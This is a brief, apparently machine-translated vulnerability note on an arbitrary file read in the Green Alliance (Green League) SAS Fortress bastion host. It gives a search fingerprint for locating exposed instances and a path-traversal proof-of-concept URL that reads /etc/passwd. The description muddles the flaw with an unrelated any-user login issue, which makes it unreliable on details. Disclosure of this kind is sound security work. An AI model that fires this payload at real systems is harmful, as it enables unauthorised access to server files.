Green League Sas Fortress Getfile Arbitrary File Reading Vulnerability
Green League Sas Fortress Getfile Arbitrary File Reading Vulnerability
Green Alliance SAS Fortress GetFile arbitrary file reading vulnerability
Vulnerability Description
Green Alliance Fortress has a vulnerability to log in any user. The attacker uses the vulnerability to include www/local_user.php to realize any user login.
Vulnerability Impact
Green League SAS Fortress
Network surveying and mapping
body=”‘/needUsbkey.php?username=’”
Vulnerability reappears
Login page
The vulnerability exists in the file GetFileController.php file
Verify POC
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.